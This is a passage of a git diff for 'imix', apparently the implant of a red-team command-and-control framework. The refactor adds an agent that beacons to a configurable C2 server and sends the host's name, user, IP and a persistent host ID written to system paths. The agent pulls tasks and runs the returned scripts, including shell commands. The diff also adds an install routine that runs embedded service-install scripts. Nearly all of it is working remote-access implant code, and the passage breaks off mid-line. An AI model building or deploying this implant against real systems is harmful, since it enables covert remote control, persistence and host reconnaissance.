b/implants/golem/tests/cli.rs index 652995c4b..cc84602a1 100644 --- a/implants/golem/tests/cli.rs +++ b/implants/golem/tests/cli.rs @@ -32,7 +32,9 @@ fn test_golem_main_syntax_fail() -> anyhow::Result<()> { cmd.arg(format!("{GOLEM_CLI_TEST_DIR}syntax_fail.tome")); cmd.assert() .failure() - .stderr(predicate::str::contains(format!("[TASK ERROR] {GOLEM_CLI_TEST_DIR}syntax_fail.tome: [eldritch] Unable to parse eldritch tome: error: Parse error: unexpected string literal \"win\" here"))); + .stderr(predicate::str::contains(format!( + r#"Parse error: unexpected string literal "win" here"# + ))); Ok(()) } diff --git a/implants/imix/Cargo.toml b/implants/imix/Cargo.toml index d1a172046..47726f3f2 100644 --- a/implants/imix/Cargo.toml +++ b/implants/imix/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "imix" -version = "0.0.4" +version = "0.0.5" edition = "2021" [dependencies] @@ -10,7 +10,9 @@ clap = { workspace = true } default-net = { workspace = true } eldritch = { workspace = true, features = ["imix"] } hyper = { workspace = true } +log = {workspace = true} openssl = { workspace = true, features = ["vendored"] } +pretty_env_logger = {workspace = true} prost-types = { workspace = true } rand = {workspace = true} reqwest = { workspace = true, features = ["blocking", "stream", "json"] } diff --git a/implants/imix/install_scripts/install_service/main.eld b/implants/imix/install_scripts/install_service/main.eldritch similarity index 100% rename from implants/imix/install_scripts/install_service/main.eld rename to implants/imix/install_scripts/install_service/main.eldritch diff --git a/implants/imix/src/agent.rs b/implants/imix/src/agent.rs new file mode 100644 index 000000000..f34662d99 --- /dev/null +++ b/implants/imix/src/agent.rs @@ -0,0 +1,127 @@ +use crate::{config::Config, task::TaskHandle}; +use anyhow::Result; +use c2::{ + pb::{Beacon, ClaimTasksRequest}, + TavernClient, +}; +use eldritch::Runtime; +use std::time::{Duration, Instant}; + +/* + * Agent contains all relevant logic for managing callbacks to a c2 server. + * It is responsible for obtaining tasks, executing them, and returning their output. 
+ */ +pub struct Agent { + info: Beacon, + tavern: TavernClient, + handles: Vec, +} + +impl Agent { + /* + * Initialize an agent using the provided configuration. + */ + pub async fn gen_from_config(cfg: Config) -> Result { + let tavern = TavernClient::connect(cfg.callback_uri).await?; + + Ok(Agent { + info: cfg.info, + tavern, + handles: Vec::new(), + }) + } + + // Claim tasks and start their execution + async fn claim_tasks(&mut self) -> Result<()> { + let tasks = self + .tavern + .claim_tasks(ClaimTasksRequest { + beacon: Some(self.info.clone()), + }) + .await? + .into_inner() + .tasks; + + #[cfg(debug_assertions)] + log::info!("claimed {} tasks", tasks.len()); + + for task in tasks { + let tome = match task.tome { + Some(t) => t, + None => { + continue; + } + }; + + let (runtime, output) = Runtime::new(); + let handle = tokio::task::spawn_blocking(move || runtime.run(tome)); + self.handles.push(TaskHandle::new(task.id, output, handle)); + + #[cfg(debug_assertions)] + log::info!("spawned task execution for id={}", task.id); + } + Ok(()) + } + + // Report task output, remove completed tasks + async fn report(&mut self) -> Result<()> { + // Report output from each handle + let mut idx = 0; + while idx < self.handles.len() { + // Drop any handles that have completed + if self.handles[idx].is_finished() { + let mut handle = self.handles.remove(idx); + handle.report(&mut self.tavern).await?; + continue; + } + + // Otherwise report and increment + self.handles[idx].report(&mut self.tavern).await?; + idx += 1; + } + + Ok(()) + } + + /* + * Callback once using the configured client to claim new tasks and report available output. + */ + pub async fn callback(&mut self) -> Result<()> { + self.claim_tasks().await?; + self.report().await?; + + Ok(()) + } + + /* + * Callback indefinitely using the configured client to claim new tasks and report available output. + */ + pub async fn callback_loop(&mut self) { + loop { + let start = Instant::now(); + + match self.callback().await { + Ok(_) => {} + Err(_err) => { + #[cfg(debug_assertions)] + log::error!("callback failed: {}", _err); + } + }; + + let interval = self.info.interval.clone(); + let delay = match interval.checked_sub(start.elapsed().as_secs()) { + Some(secs) => Duration::from_secs(secs), + None => Duration::from_secs(0), + }; + + #[cfg(debug_assertions)] + log::info!( + "completed callback in {}s, sleeping for {}s", + start.elapsed().as_secs(), + delay.as_secs() + ); + + std::thread::sleep(delay); + } + } +} diff --git a/implants/imix/src/config.rs b/implants/imix/src/config.rs new file mode 100644 index 000000000..b9c3e77bc --- /dev/null +++ b/implants/imix/src/config.rs @@ -0,0 +1,202 @@ +use crate::version::VERSION; +use c2::pb::host::Platform; +use std::{ + fs::{self, File}, + io::Write, + path::Path, +}; +use uuid::Uuid; + +macro_rules! callback_uri { + () => { + match option_env!("IMIX_CALLBACK_URI") { + Some(uri) => uri, + None => "http://127.0.0.1:80/grpc", + } + }; +} +/* + * Compile-time constant for the agent callback URI, derived from the IMIX_CALLBACK_URI environment variable during compilation. + * Defaults to "http://127.0.0.1:80/grpc" if this is unset. + */ +pub const CALLBACK_URI: &'static str = callback_uri!(); + +macro_rules! callback_interval { + () => { + match option_env!("IMIX_CALLBACK_INTERVAL") { + Some(interval) => interval, + None => "5", + } + }; +} +/* Compile-time constant for the agent retry interval, derived from the IMIX_RETRY_INTERVAL environment variable during compilation. + * Defaults to 5 if unset. 
+ */ +pub const CALLBACK_INTERVAL: &'static str = callback_interval!(); + +macro_rules! retry_interval { + () => { + match option_env!("IMIX_RETRY_INTERVAL") { + Some(interval) => interval, + None => "5", + } + }; +} +/* Compile-time constant for the agent callback interval, derived from the IMIX_CALLBACK_INTERVAL environment variable during compilation. + * Defaults to 5 if unset. + */ +pub const RETRY_INTERVAL: &'static str = retry_interval!(); + +/* + * Config holds values necessary to configure an Agent. + */ +#[derive(Debug, Clone)] +pub struct Config { + pub info: c2::pb::Beacon, + pub callback_uri: String, + pub retry_interval: u64, +} + +/* + * A default configuration for the agent. + */ +impl Default for Config { + fn default() -> Self { + let agent = c2::pb::Agent { + identifier: format!("imix-v{}", VERSION), + }; + + let host = c2::pb::Host { + name: whoami::hostname(), + identifier: get_host_id(get_host_id_path()), + platform: get_host_platform() as i32, + primary_ip: get_primary_ip(), + }; + + let info = c2::pb::Beacon { + identifier: String::from(Uuid::new_v4()), + principal: whoami::username(), + interval: match CALLBACK_INTERVAL.parse::() { + Ok(i) => i, + Err(_err) => { + #[cfg(debug_assertions)] + log::error!("failed to parse callback interval constant, defaulting to 5 seconds: {_err}"); + + 5 as u64 + } + }, + host: Some(host), + agent: Some(agent), + }; + + Config { + info, + callback_uri: String::from(CALLBACK_URI), + retry_interval: match RETRY_INTERVAL.parse::() { + Ok(i) => i, + Err(_err) => { + #[cfg(debug_assertions)] + log::error!( + "failed to parse retry interval constant, defaulting to 5 seconds: {_err}" + ); + + 5 as u64 + } + }, + } + } +} + +/* + * Returns which Platform imix has been compiled for. + */ +fn get_host_platform() -> Platform { + #[cfg(target_os = "linux")] + return Platform::Linux; + + #[cfg(target_os = "macos")] + return Platform::Macos; + + #[cfg(target_os = "windows")] + return Platform::Windows; + + #[cfg(any(target_os = "freebsd", target_os = "netbsd", target_os = "openbsd"))] + return Platform::Bsd; + + #[cfg(all( + not(target_os = "linux"), + not(target_os = "macos"), + not(target_os = "windows"), + not(target_os = "freebsd"), + not(target_os = "netbsd"), + not(target_os = "openbsd"), + ))] + return Platform::Unspecified; +} + +/* + * Returns a predefined path to the host id file based on the current platform. + */ +fn get_host_id_path() -> String { + #[cfg(target_os = "windows")] + return String::from("C:\\ProgramData\\system-id"); + + #[cfg(not(target_os = "windows"))] + return String::from("/etc/system-id"); +} + +/* + * Attempt to read a host-id from a predefined path on disk. + * If the file exist, it's value will be returned as the identifier. + * If the file does not exist, a new value will be generated and written to the file. + * If there is any failure reading / writing the file, the generated id is still returned. 
+ */ +fn get_host_id(file_path: String) -> String { + // Read Existing Host ID + let path = Path::new(file_path.as_str()); + if path.exists() { + match fs::read_to_string(path) { + Ok(host_id) => return host_id.trim().to_string(), + Err(_) => {} + } + } + + // Generate New + let host_id = Uuid::new_v4().to_string(); + + // Save to file + match File::create(path) { + Ok(mut f) => match f.write_all(host_id.as_bytes()) { + Ok(_) => {} + Err(_err) => { + #[cfg(debug_assertions)] + log::error!("failed to write host id file: {_err}"); + } + }, + Err(_err) => { + #[cfg(debug_assertions)] + log::error!("failed to create host id file: {_err}"); + } + }; + + return host_id; +} + +/* + * Return the first IPv4 address of the default interface as a string. + * Returns the empty string otherwise. + */ +fn get_primary_ip() -> String { + match default_net::get_default_interface() { + Ok(default_interface) => match default_interface.ipv4.first() { + Some(ip) => ip.addr.to_string(), + None => String::from(""), + }, + Err(_err) => { + #[cfg(debug_assertions)] + log::error!("failed to get primary ip: {_err}"); + + String::from("") + } + } +} diff --git a/implants/imix/src/exec.rs b/implants/imix/src/exec.rs deleted file mode 100644 index 80a7d544a..000000000 --- a/implants/imix/src/exec.rs +++ /dev/null @@ -1,215 +0,0 @@ -use anyhow::{Error, Result}; -use c2::pb::Task; -use chrono::{DateTime, Utc}; -use eldritch::{eldritch_run, EldritchPrintHandler}; -use std::sync::mpsc::Receiver; -use std::sync::mpsc::Sender; -use std::thread; -use tokio::task::JoinHandle; -use tokio::time::Duration; - -pub struct AsyncTask { - pub future_join_handle: JoinHandle>, - pub start_time: DateTime, - pub grpc_task: Task, - pub print_reciever: Receiver, - pub error_reciever: Receiver, -} - -async fn handle_exec_tome( - task: Task, - print_channel_sender: Sender, -) -> Result<(String, String)> { - // TODO: Download auxillary files from CDN - - // Read a tome script - // let task_quest = match task.quest { - // Some(quest) => quest, - // None => return Ok(("".to_string(), format!("No quest associated for task ID: {}", task.id))), - // }; - - let print_handler = EldritchPrintHandler { - sender: print_channel_sender, - }; - - // Execute a tome script - let res = match thread::spawn(move || { - eldritch_run( - task.id.to_string(), - task.eldritch.clone(), - Some(task.parameters.clone()), - &print_handler, - ) - }) - .join() - { - Ok(local_thread_res) => local_thread_res, - Err(_) => todo!(), - }; - match res { - Ok(tome_output) => Ok((tome_output, "".to_string())), - Err(tome_error) => Ok(("".to_string(), tome_error.to_string())), - } -} - -pub async fn handle_exec_timeout_and_response( - task: Task, - print_channel_sender: Sender, - error_channel_sender: Sender, - timeout: Option, -) -> Result<(), Error> { - // Tasks will be forcebly stopped after 1 week. - let timeout_duration = timeout.unwrap_or_else(|| Duration::from_secs(60 * 60 * 24 * 7)); - - // Define a future for our execution task - let exec_future = handle_exec_tome(task.clone(), print_channel_sender.clone()); - // Execute that future with a timeout defined by the timeout argument. 
- let tome_result = match tokio::time::timeout(timeout_duration, exec_future).await { - Ok(res) => match res { - Ok(tome_result) => tome_result, - Err(tome_error) => ("".to_string(), tome_error.to_string()), - }, - Err(timer_elapsed) => ( - "".to_string(), - format!( - "Time elapsed task {} has been running for {} seconds", - task.id, - timer_elapsed.to_string() - ), - ), - }; - - print_channel_sender - .clone() - .send(format!("---[RESULT]----\n{}\n---------", tome_result.0))?; - print_channel_sender // Temporary - pending UI updates - .clone() - .send(format!("---[ERROR]----\n{}\n--------", tome_result.1))?; - error_channel_sender.clone().send(tome_result.1)?; - Ok(()) -} - -#[cfg(test)] -mod tests { - use crate::tasks::drain_sender; - - use super::{handle_exec_timeout_and_response, handle_exec_tome}; - use anyhow::Result; - use c2::pb::Task; - use std::collections::HashMap; - use std::sync::mpsc::channel; - use std::time::Duration; - - #[test] - fn imix_handle_exec_tome() -> Result<()> { - let test_tome_input = Task { - id: 123, - eldritch: r#" -print(sys.shell(input_params["cmd"])["stdout"]) -1"# - .to_string(), - parameters: HashMap::from([("cmd".to_string(), "echo hello_from_stdout".to_string())]), - file_names: Vec::new(), - quest_name: "test_quest".to_string(), - }; - - let runtime = tokio::runtime::Builder::new_multi_thread() - .enable_all() - .build() - .unwrap(); - - let (sender, receiver) = channel::(); - - let exec_future = handle_exec_tome(test_tome_input, sender.clone()); - let (eld_output, eld_error) = runtime.block_on(exec_future)?; - - let cmd_output = receiver.recv_timeout(Duration::from_millis(500))?; - assert!(cmd_output.contains("hello_from_stdout")); - assert_eq!(eld_output, "1".to_string()); - assert_eq!(eld_error, "".to_string()); - Ok(()) - } - - #[tokio::test] - async fn imix_handle_exec_tome_error() -> Result<()> { - let (print_sender, print_reciever) = channel::(); - let (error_sender, error_reciever) = channel::(); - let _res = handle_exec_timeout_and_response( - Task { - id: 123, - eldritch: r#"print(no_var) -"# - .to_string(), - parameters: HashMap::from([]), - file_names: Vec::from([]), - quest_name: "Poggers".to_string(), - }, - print_sender, - error_sender, - None, - ) - .await?; - - let task_channel_error = drain_sender(&error_reciever)?; - let _task_channel_output = drain_sender(&print_reciever)?; - - assert!(task_channel_error.contains(&"Variable `no_var` not found".to_string())); - Ok(()) - } - - // This test - // #[test] - // fn imix_handle_exec_tome_timeout() -> Result<()> { - // let test_tome_input = Task { - // id: 123, - // eldritch: r#" - // print("Hello_world") - // time.sleep(5) - // "# - // .to_string(), - // parameters: HashMap::new(), - // }; - - // let runtime: tokio::runtime::Runtime = tokio::runtime::Builder::new_multi_thread() - // .enable_all() - // .build() - // .unwrap(); - - // let (sender, receiver) = channel::(); - - // let start_time = Instant::now(); - // let exec_future = handle_exec_timeout_and_response( - // test_tome_input, - // sender.clone(), - // Some(Duration::from_secs(2)), - // ); - // runtime.block_on(exec_future)?; - // let end_time = Instant::now(); - // let mut index = 0; - // loop { - // let cmd_output = match receiver.recv_timeout(Duration::from_millis(800)) { - // Ok(local_res_string) => local_res_string, - // Err(local_err) => { - // match local_err.to_string().as_str() { - // "channel is empty and sending half is closed" => { - // break; - // } - // "timed out waiting on channel" => break, - // _ => 
eprint!("Error: {}", local_err), - // } - // break; - // } - // }; - // println!("eld_output: {}", cmd_output); - // index = index + 1; - // } - - // println!( - // "Diff {:?}", - // end_time.checked_duration_since(start_time).unwrap() - // ); - // assert!(end_time.checked_duration_since(start_time).unwrap() < Duration::from_secs(3)); - - // Ok(()) - // } -} diff --git a/implants/imix/src/init.rs b/implants/imix/src/init.rs deleted file mode 100644 index 681058b2f..000000000 --- a/implants/imix/src/init.rs +++ /dev/null @@ -1,306 +0,0 @@ -use anyhow::{Context, Result}; -use c2::pb::host::Platform; -use std::{ - fs::{self, File}, - io::Write, - path::Path, -}; -use sys_info::{linux_os_release, os_release}; -use uuid::Uuid; - -use crate::Config; - -#[derive(Clone, Debug)] -pub struct AgentProperties { - pub principal: String, - pub hostname: String, - pub beacon_id: String, - pub host_id: String, - pub primary_ip: Option, - pub agent_id: String, - pub host_platform: Platform, -} - -fn get_principal() -> Result { - Ok(whoami::username()) -} - -fn get_hostname() -> Result { - Ok(whoami::hostname()) -} - -fn get_beacon_id() -> Result { - let beacon_id = Uuid::new_v4(); - Ok(beacon_id.to_string()) -} - -fn get_host_id(host_id_file_path: String) -> Result { - let mut host_id = Uuid::new_v4().to_string(); - let host_id_file = Path::new(&host_id_file_path); - if host_id_file.exists() { - host_id = match fs::read_to_string(host_id_file) { - Ok(tmp_host_id) => tmp_host_id.trim().to_string(), - Err(_) => host_id, - }; - } else { - let mut host_id_file_obj = match File::create(host_id_file) { - Ok(tmp_file_obj) => tmp_file_obj, - Err(_) => return Ok(host_id), // An error occured don't save. Just go. - }; - match host_id_file_obj.write_all(host_id.as_bytes()) { - Ok(_) => {} // Don't care if write fails or not going to to send our generated one. - Err(_) => {} - } - } - Ok(host_id) -} - -fn get_primary_ip() -> Result { - let res = match default_net::get_default_interface() { - Ok(default_interface) => { - if default_interface.ipv4.len() > 0 { - default_interface - .ipv4 - .get(0) - .context("No ips found")? 
- .addr - .to_string() - } else { - "DANGER-UNKNOWN".to_string() - } - } - Err(_err) => { - #[cfg(debug_assertions)] - eprintln!("Error getting primary ip address:\n{_err}"); - "DANGER-UNKNOWN".to_string() - } - }; - Ok(res) -} - -fn get_host_platform() -> Result { - if cfg!(target_os = "linux") { - return Ok(Platform::Linux); - } else if cfg!(target_os = "windows") { - return Ok(Platform::Windows); - } else if cfg!(target_os = "macos") { - return Ok(Platform::Macos); - } else if cfg!(target_os = "freebsd") - || cfg!(target_os = "openbsd") - || cfg!(target_os = "netbsd") - { - return Ok(Platform::Bsd); - } else { - return Ok(Platform::Unspecified); - } -} - -fn _get_os_pretty_name() -> Result { - if cfg!(target_os = "linux") { - let linux_rel = linux_os_release()?; - let pretty_name = match linux_rel.pretty_name { - Some(local_pretty_name) => local_pretty_name, - None => "UNKNOWN-Linux".to_string(), - }; - return Ok(format!("{}", pretty_name)); - } else if cfg!(target_os = "windows") || cfg!(target_os = "macos") { - return Ok(os_release()?); - } else { - return Ok("UNKNOWN".to_string()); - } -} - -pub fn agent_init(config_path: String, host_id_path: String) -> Result<(AgentProperties, Config)> { - let config_file = - File::open(config_path.clone()).with_context(|| format!("Failed to open {config_path}"))?; - - let imix_config = serde_json::from_reader(config_file) - .with_context(|| format!("Failed to parse {config_path}"))?; - - let principal = match get_principal() { - Ok(username) => username, - Err(_error) => { - #[cfg(debug_assertions)] - eprintln!("Unable to get process username\n{}", _error); - "UNKNOWN".to_string() - } - }; - - let hostname = match get_hostname() { - Ok(tmp_hostname) => tmp_hostname, - Err(_error) => { - #[cfg(debug_assertions)] - eprintln!("Unable to get system hostname\n{}", _error); - "UNKNOWN".to_string() - } - }; - - let beacon_id = match get_beacon_id() { - Ok(tmp_beacon_id) => tmp_beacon_id, - Err(_error) => { - #[cfg(debug_assertions)] - eprintln!("Unable to get a random beacon id\n{}", _error); - "DANGER-UNKNOWN".to_string() - } - }; - - let agent_id = format!( - "{}-{}", - "imix", - option_env!("CARGO_PKG_VERSION").unwrap_or_else(|| "UNKNOWN") - ); - - let host_platform = match get_host_platform() { - Ok(tmp_host_platform) => tmp_host_platform, - Err(_error) => { - #[cfg(debug_assertions)] - eprintln!("Unable to get host platform id\n{}", _error); - Platform::Unspecified - } - }; - - let primary_ip = match get_primary_ip() { - Ok(tmp_primary_ip) => Some(tmp_primary_ip), - Err(_error) => { - #[cfg(debug_assertions)] - eprintln!("Unable to get primary ip\n{}", _error); - None - } - }; - - // let host_id_file = if cfg!(target_os = "windows") { - // "C:\\ProgramData\\system-id" - // } else { - // "/etc/system-id" - // } - // .to_string(); - - let host_id = match get_host_id(host_id_path) { - Ok(tmp_host_id) => tmp_host_id, - Err(_error) => { - #[cfg(debug_assertions)] - eprintln!("Unable to get or create a host id\n{}", _error); - "DANGER-UNKNOWN".to_string() - } - }; - - Ok(( - AgentProperties { - principal, - hostname, - beacon_id, - host_id, - primary_ip, - agent_id, - host_platform, - }, - imix_config, - )) -} - -#[cfg(test)] -mod tests { - use anyhow::Context; - use tempfile::NamedTempFile; - - use super::*; - - #[test] - fn imix_test_agent_init() -> Result<()> { - let mut tmp_file = NamedTempFile::new()?; - let tmp_path = tmp_file - .path() - .to_str() - .context("Failed to get path")? 
- .to_string(); - tmp_file.write_all( - r#"{ - "service_configs": [ - { - "name": "imix", - "description": "Imix c2 agent", - "executable_name": "imix", - "executable_args": "" - } - ], - "target_forward_connect_ip": "127.0.0.1", - "target_name": "test1234", - "callback_config": { - "interval": 4, - "jitter": 1, - "timeout": 4, - "c2_configs": [ - { - "priority": 1, - "uri": "http://127.0.0.1/grpc" - } - ] - } - } - "# - .as_bytes(), - )?; - let tmp_file = NamedTempFile::new()?; - let tmp_host_id = String::from(tmp_file.path().to_str().unwrap()); - - let (properties, _config) = agent_init(tmp_path.clone(), tmp_host_id.clone())?; - let (properties2, config2) = agent_init(tmp_path, tmp_host_id)?; - assert_eq!(properties.host_id, properties2.host_id); - assert_ne!(properties.beacon_id, properties2.beacon_id); - assert!(properties2.agent_id.contains("imix-")); - assert_eq!( - config2 - .callback_config - .c2_configs - .get(0) - .context("No callbacks configured")? - .uri, - "http://127.0.0.1/grpc" - ); - Ok(()) - } - - #[test] - fn imix_test_get_os_pretty_name() { - assert!(_get_os_pretty_name().is_ok()); - } - - #[test] - fn imix_test_get_principal() { - assert!(get_principal().is_ok()) - } - - #[test] - fn imix_test_get_hostname() { - assert!(get_hostname().is_ok()) - } - - #[test] - fn imix_test_get_beacon_id() { - assert!(get_beacon_id().is_ok()) - } - - #[test] - fn imix_test_get_host_id() -> Result<()> { - let tmp_file = NamedTempFile::new()?; - let tmp_path = tmp_file - .path() - .to_str() - .context("Failed to get path")? - .to_string(); - let host_id = get_host_id(tmp_path.clone())?; - let host_id2 = get_host_id(tmp_path)?; - assert_eq!(host_id, host_id2); - Ok(()) - } - - #[test] - fn imix_test_get_primary_ip() { - assert!(get_primary_ip().is_ok()) - } - - #[test] - fn imix_test_get_host_platform() { - assert!(get_host_platform().is_ok()) - } -} diff --git a/implants/imix/src/install.rs b/implants/imix/src/install.rs index 36b417954..2bf5478df 100644 --- a/implants/imix/src/install.rs +++ b/implants/imix/src/install.rs @@ -1,127 +1,81 @@ +use anyhow::{anyhow, Result}; +use eldritch::{pb::Tome, Runtime}; use std::collections::HashMap; -use std::thread; -use eldritch::{eldritch_run, StdPrintHandler}; +pub async fn install() { + #[cfg(debug_assertions)] + log::info!("starting installation"); -async fn execute_tomes_in_parallel( - tome_name_and_content: Vec<(String, String)>, - custom_config: Option<&str>, -) -> anyhow::Result<(i32, Vec)> { - let tome_parameters = match custom_config { - Some(config_path) => Some(HashMap::from([( - "custom_config".to_string(), - config_path.to_string(), - )])), - None => None, - }; - - // Queue async tasks - let mut all_tome_futures: Vec<(String, _)> = vec![]; - for tome_data in tome_name_and_content { - // let custom_config_string = custom_config.unwrap().to_string().to_owned(); - let local_tome_parameters = tome_parameters.clone(); - let tmp_row = ( - tome_data.0.clone().to_string(), - thread::spawn(move || { - eldritch_run( - tome_data.0, - tome_data.1, - local_tome_parameters, - &StdPrintHandler {}, - ) - }), - ); - all_tome_futures.push(tmp_row) - } - - let mut error_code = 0; - let mut result: Vec = Vec::new(); - for tome_task in all_tome_futures { - let tome_name: String = tome_task.0; - // Join our - let tome_result_thread_join = match tome_task.1.join() { - Ok(local_thread_join_res) => local_thread_join_res, - Err(_) => { - error_code = 1; - Err(anyhow::anyhow!("An error occured waiting for the tome thread to complete while executing 
{tome_name}.")) - } - }; - - match tome_result_thread_join { - Ok(local_tome_result) => result.push(local_tome_result), - Err(task_error) => { - error_code = 1; - eprintln!("[TASK ERROR] {tome_name}: {task_error}"); - } - } - } - Ok((error_code, result)) -} - -pub fn install_main(custom_config: Option<&str>) -> anyhow::Result<()> { - let mut tome_files_and_content: Vec<(String, String)> = Vec::new(); + // Iterate through all embedded files for embedded_file_path in eldritch::assets::Asset::iter() { let filename = match embedded_file_path.split(r#"/"#).last() { Some(local_filename) => local_filename, None => "", }; - println!("{}", embedded_file_path); + + #[cfg(debug_assertions)] + log::debug!("checking asset {embedded_file_path}"); + + // Evaluate all "main.eldritch" files if filename == "main.eldritch" { - let tome_path = embedded_file_path.to_string().clone(); - let tome_contents_extraction_result = - match eldritch::assets::Asset::get(embedded_file_path.as_ref()) { - Some(local_tome_content) => String::from_utf8(local_tome_content.data.to_vec()), - None => { - eprint!("Failed to extract eldritch script as string"); - Ok("".to_string()) - } - }; + // Read eldritch content from embedded file + #[cfg(debug_assertions)] + log::info!("loading tome {embedded_file_path}"); + let eldritch = match load_embedded_eldritch(embedded_file_path.to_string()) { + Ok(content) => content, + Err(_err) => { + #[cfg(debug_assertions)] + log::error!("failed to load install asset: {_err}"); - let tome_contents = match tome_contents_extraction_result { - Ok(local_tome_contents) => local_tome_contents, - Err(utf8_error) => { - eprint!("Failed to extract eldritch script as string {utf8_error}"); - "".to_string() + continue; } }; - tome_files_and_content.push((tome_path, tome_contents)) - } - } - let runtime = tokio::runtime::Builder::new_current_thread() - .enable_all() - .build() - .unwrap(); - let (_error_code, result) = match runtime.block_on(execute_tomes_in_parallel( - tome_files_and_content, - custom_config, - )) { - Ok(response) => response, - Err(error) => { - println!("Error executing tomes {:?}", error); - (-1, Vec::new()) - } - }; + // Run tome + #[cfg(debug_assertions)] + log::info!("running tome {embedded_file_path}"); + let (runtime, output) = Runtime::new(); + match tokio::task::spawn_blocking(move || { + runtime.run(Tome { + eldritch, + parameters: HashMap::new(), + file_names: Vec::new(), + }); + }) + .await + { + Ok(_) => {} + Err(_err) => { + #[cfg(debug_assertions)] + log::error!("failed waiting for tome execution: {}", _err); + } + } - if result.len() > 0 { - println!("{:?}", result); + let _output = output.collect().join(""); + #[cfg(debug_assertions)] + log::info!("{_output}"); + } } - Ok(()) } -#[cfg(test)] -mod tests { - use super::*; - #[tokio::test] - async fn imix_test_execute_tomes_in_parallel() -> anyhow::Result<()> { - let tome_files_and_content = [( - "test_hello.eldritch".to_string(), - "'hello world'".to_string(), - )]; - let (error_code, result) = - execute_tomes_in_parallel(tome_files_and_content.to_vec(), None).await?; - assert_eq!(error_code, 0); - assert!(result.contains(&"hello world".to_string())); - Ok(()) +fn load_embedded_eldritch(path: String) -> Result { + match eldritch::assets::Asset::get(path.as_ref()) { + Some(f) => Ok(String::from_utf8(f.data.to_vec())?), + + // { + // Ok(data) => data, + // Err(_err) => { + // #[cfg(debug_assertions)] + // log::error!("failed to load install asset: {_err}"); + + // return + // }, + // }, + None => { + #[cfg(debug_assertions)] + 
log::error!("no asset file at {}", path); + + return Err(anyhow!("no asset file at {}", path)); + } } } diff --git a/implants/imix/src/lib.rs b/implants/imix/src/lib.rs index 83ebc6ce6..3d99fb08c 100644 --- a/implants/imix/src/lib.rs +++ b/implants/imix/src/lib.rs @@ -1,56 +1,9 @@ -use serde::{Deserialize, Serialize}; - -pub mod exec; -pub mod init; -pub mod install; -pub mod tasks; - -#[derive(Debug)] -pub enum Error { - Io(std::io::Error), - SerdeJson(serde_json::Error), -} - -impl From for Error { - fn from(error: std::io::Error) -> Self { - Error::Io(error) - } -} - -impl From for Error { - fn from(error: serde_json::Error) -> Self { - Error::SerdeJson(error) - } -} - -#[derive(Serialize, Deserialize, Clone)] -pub struct C2Config { - pub uri: String, - pub priority: u8, -} - -#[derive(Serialize, Deserialize, Clone)] -pub struct ServiceConfig { - name: String, - description: String, - executable_name: String, - executable_args: String, -} - -#[derive(Serialize, Deserialize, Clone)] -pub struct CallbackConfig { - pub interval: u64, - pub jitter: u64, - pub timeout: u64, - pub c2_configs: Vec, -} - -#[derive(Serialize, Deserialize, Clone)] -pub struct Config { - pub target_name: String, - pub target_forward_connect_ip: String, - pub callback_config: CallbackConfig, - pub service_configs: Vec, -} - -pub type TaskID = i64; +mod agent; +mod config; +mod install; +mod task; +mod version; + +pub use agent::Agent; +pub use config::Config; +pub use install::install; diff --git a/implants/imix/src/main.rs b/implants/imix/src/main.rs index abbef4b40..d6defd867 100644 --- a/implants/imix/src/main.rs +++ b/implants/imix/src/main.rs @@ -1,429 +1,54 @@ use anyhow::Result; -use c2::pb::c2_manual_client::TavernClient; -use c2::pb::TaskOutput; -use clap::{arg, Command}; -use imix::exec::AsyncTask; -use imix::init::agent_init; -use imix::tasks::{start_new_tasks, submit_task_output}; -use imix::{install, tasks, Config, TaskID}; -use std::collections::HashMap; -use std::time::Instant; +use clap::Command; +use imix::{Agent, Config}; +use std::time::Duration; -fn get_callback_uri(imix_config: Config) -> Result { - Ok(imix_config.callback_config.c2_configs[0].uri.clone()) -} - -fn do_delay(interval: u64, loop_start_time: Instant) { - let time_to_sleep = interval - .checked_sub(loop_start_time.elapsed().as_secs()) - .unwrap_or_else(|| 0); - - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Callback failed sleeping seconds {}", - (Instant::now() - loop_start_time).as_millis(), - time_to_sleep - ); - - std::thread::sleep(std::time::Duration::new(time_to_sleep as u64, 24601)); -} - -// Async handler for port scanning. 
-async fn main_loop(config_path: String, _loop_count_max: Option) -> Result<()> { +#[tokio::main(flavor = "multi_thread", worker_threads = 128)] +async fn main() { #[cfg(debug_assertions)] - let mut debug_loop_count: i32 = 0; - - // This hashmap tracks all tasks by their ID (key) and a tuple value: (future, channel_reciever) - // AKA Work queue - let mut all_exec_futures: HashMap = HashMap::new(); - // This hashmap tracks all tasks output - // AKA Results queue - let mut all_task_res_map: HashMap> = HashMap::new(); - - let host_id_file = if cfg!(target_os = "windows") { - "C:\\ProgramData\\system-id" - } else { - "/etc/system-id" + init_logging(); + + match Command::new("imix") + .subcommand(Command::new("install").about("Install imix")) + .get_matches() + .subcommand() + { + Some(("install", _)) => { + imix::install().await; + return; + } + _ => {} } - .to_string(); - - let (agent_properties, imix_config) = agent_init(config_path, host_id_file)?; loop { - // 0. Get loop start time - let _loop_start_time = Instant::now(); - + let cfg = Config::default(); + let retry_interval = cfg.retry_interval; #[cfg(debug_assertions)] - eprintln!("Get new tasks"); - - // 1. Pull down new tasks - // 1a) calculate callback uri - let cur_callback_uri = get_callback_uri(imix_config.clone())?; + log::info!("agent config initialized {:#?}", cfg.clone()); - // 1b) Setup the tavern client - let tavern_client = match TavernClient::connect(cur_callback_uri.clone()).await { - Ok(t) => t, + match run(cfg).await { + Ok(_) => {} Err(_err) => { #[cfg(debug_assertions)] - eprintln!("failed to create tavern client {}", _err); - do_delay(imix_config.callback_config.interval, _loop_start_time); - continue; - } - }; - - // 1c) Collect new tasks - #[cfg(debug_assertions)] - eprintln!( - "[{}]: collecting tasks", - (Instant::now() - _loop_start_time).as_millis() - ); - - let new_tasks = match tasks::get_new_tasks( - agent_properties.clone(), - imix_config.clone(), - tavern_client.clone(), - ) - .await - { - Ok(local_new_tasks) => local_new_tasks, - Err(_local_err) => { - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Error getting new tasks {}", - (Instant::now() - _loop_start_time).as_millis(), - _local_err - ); - do_delay(imix_config.callback_config.interval, _loop_start_time); - continue; - } - }; - - // 2. Start new tasks - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Starting {} new tasks", - (Instant::now() - _loop_start_time).as_millis(), - new_tasks.len() - ); - - match start_new_tasks(new_tasks, &mut all_exec_futures, _loop_start_time).await { - Ok(_is_ok) => {} - Err(_local_err) => { - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Failed to start new tasks: {}", - (Instant::now() - 